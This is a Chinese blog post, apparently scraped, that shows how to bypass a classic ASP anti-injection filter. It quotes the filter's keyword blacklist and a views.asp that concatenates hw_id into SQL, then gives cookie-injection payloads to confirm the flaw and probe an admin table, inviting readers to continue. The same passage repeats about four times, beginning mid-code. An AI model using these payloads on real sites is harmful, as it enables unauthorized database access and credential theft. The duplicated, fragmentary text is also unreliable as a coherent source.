rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42075) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42074) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42073) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42072) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~